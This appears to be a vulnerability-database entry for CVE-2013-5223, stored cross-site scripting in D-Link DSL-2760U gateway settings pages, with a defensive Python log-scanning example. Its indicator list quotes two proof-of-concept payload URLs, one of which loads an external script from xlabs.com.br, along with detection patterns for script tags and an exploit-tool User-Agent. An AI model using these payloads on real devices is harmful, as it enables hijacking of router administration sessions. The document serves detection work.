CVE-2013-5223
published 2013-11-19


Priority: P2 (74); medium, 5.4 (CVSS 3.1)
Vector: AV:N / AC:L / PR:L / UI:R / S:C / C:L / I:L / A:N
Tags: KEV, ITW, EXPLOIT
CISA Known Exploited Vulnerability, due 2022-04-15
Exploited in the wild
EPSS: 33.57% (98.2th percentile)
Multiple cross-site scripting (XSS) vulnerabilities in D-Link DSL-2760U Gateway (Rev. E1) allow remote authenticated users to inject arbitrary web script or HTML via the (1) ntpServer1 parameter to sntpcfg.cgi, username parameter to (2) ddnsmngr.cmd or (3) todmngr.tod, (4) TodUrlAdd parameter to urlfilter.cmd, (5) appName parameter to scprttrg.cmd, (6) fltName in an add action or (7) rmLst parameter in a remove action to scoutflt.cmd, (8) groupName parameter to portmapcfg.cmd, (9) snmpRoCommunity parameter to snmpconfig.cgi, (10) fltName parameter to scinflt.cmd, (11) PolicyName in an add action or (12) rmLst parameter in a remove action to prmngr.cmd, (13) ippName parameter to ippcfg.cmd, (14) smbNetBiosName or (15) smbDirName parameter to samba.cgi, or (16) wlSsid parameter to wlcfg.wl.

Affected

1 range

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dlink | dsl-2760u_firmware | < 1.12 | 1.12 |

Detection & IOCs (extracted from sources)

path: /sntpcfg.cgi
path: /ddnsmngr.cmd
path: /todmngr.tod
path: /urlfilter.cmd
path: /scprttrg.cmd
path: /scoutflt.cmd
path: /portmapcfg.cmd
path: /snmpconfig.cgi
path: /scinflt.cmd
path: /prmngr.cmd
path: /ippcfg.cmd
path: /samba.cgi
path: /wlcfg.wl
url: /todmngr.tod?action=add&username=%3Cscript%3Ealert%28%27XLabs%27%29%3C%2fscript%3E&mac=AA:BB:CC:DD:EE:FF&days=1&start_time=720&end_time=840
url: /todmngr.tod?action=set_url&TodUrlAdd=GameOver%3Cscript%20src%3D%27%2f%2fxlabs.com.br%2fxssi.js%27%3E%3C%2fscript%3E&port_num=1234
  • Monitor HTTP GET requests to any of the vulnerable CGI/CMD endpoints (sntpcfg.cgi, ddnsmngr.cmd, todmngr.tod, urlfilter.cmd, scprttrg.cmd, scoutflt.cmd, portmapcfg.cmd, snmpconfig.cgi, scinflt.cmd, prmngr.cmd, ippcfg.cmd, samba.cgi, wlcfg.wl) containing URL-encoded script tags (e.g., %3Cscript%3E) in parameter values.
  • Detect exploit tool activity by alerting on the User-Agent string 'XLabs Security Exploit Browser/1.0' in HTTP request logs targeting D-Link gateway management interfaces.
  • Alert on GET requests to /todmngr.tod with action=add or action=set_url containing URL-encoded HTML/script payloads in the username or TodUrlAdd parameters, as used by the proof-of-concept exploits.
  • Flag outbound script loads from device management pages to external domains (e.g., xlabs.com.br/xssi.js), which indicate successful stored XSS exploitation via the TodUrlAdd parameter.
  • The vulnerability requires the attacker to be authenticated; unauthenticated exploitation is not possible per the CVE description.
  • The CVE specifically affects D-Link DSL-2760U Gateway Rev. E1; the exploit-db PoCs target the related DSL-500B Gen 2 model, so detection rules should account for both device variants on the network.
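
The first three detection notes above, sketched as a log check. This is an added example, not code from the advisory or from D-Link. It assumes access logs in the Apache/nginx "combined" format and treats any HTML tag opener in a parameter value as suspicious; the sample lines are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Endpoints named in the CVE-2013-5223 description.
ENDPOINTS = {
    "sntpcfg.cgi", "ddnsmngr.cmd", "todmngr.tod", "urlfilter.cmd",
    "scprttrg.cmd", "scoutflt.cmd", "portmapcfg.cmd", "snmpconfig.cgi",
    "scinflt.cmd", "prmngr.cmd", "ippcfg.cmd", "samba.cgi", "wlcfg.wl",
}
TOOL_UA = "XLabs Security Exploit Browser/1.0"  # User-Agent quoted on this page
# Assumption: an HTML tag opener never belongs in a gateway setting value.
MARKUP = re.compile(r"<\s*/?\s*[a-z]", re.I)
# Assumption: logs are in Apache/nginx "combined" format.
LINE = re.compile(
    r'^\S+ .*?"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)


def inspect(line):
    """Return the findings for one access-log line (empty list if clean)."""
    m = LINE.match(line)
    if not m:
        return []
    findings = []
    if TOOL_UA in m["ua"]:
        findings.append("exploit-tool-user-agent")
    url = urlsplit(m["target"])
    endpoint = url.path.rsplit("/", 1)[-1].lower()
    if m["method"] == "GET" and endpoint in ENDPOINTS:
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            # parse_qsl decodes once; unquote again to catch double encoding.
            if MARKUP.search(value) or MARKUP.search(unquote(value)):
                findings.append(f"markup-in-param:{endpoint}:{name}")
    return findings


# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Nov/2013:10:00:00 +0000] "GET /sntpcfg.cgi?ntpServer1=pool.ntp.org HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.66 - - [19/Nov/2013:10:01:00 +0000] "GET /todmngr.tod?action=add&username=%3Cscript%3Ealert%28%27XLabs%27%29%3C%2fscript%3E&mac=AA:BB:CC:DD:EE:FF HTTP/1.1" 200 512 "-" "XLabs Security Exploit Browser/1.0"',
    '192.0.2.67 - - [19/Nov/2013:10:02:00 +0000] "GET /wlcfg.wl?wlSsid=home%253Cscript%253E HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.68 - - [19/Nov/2013:10:03:00 +0000] "GET /index.html?q=%3Cb%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(inspect(entry) or "clean", "<-", entry[:60])
```

The check is scoped to the listed endpoints, so the fourth sample line is not flagged even though it carries markup.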

CVSS provenance

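| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 5.4 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N |
| nvd | v2.0 | 3.5 | LOW | AV:N/AC:M/Au:S/C:N/I:P/A:N |
| vulncheck | | 5.4 | MEDIUM | |
| cisa | | 5.4 | MEDIUM | |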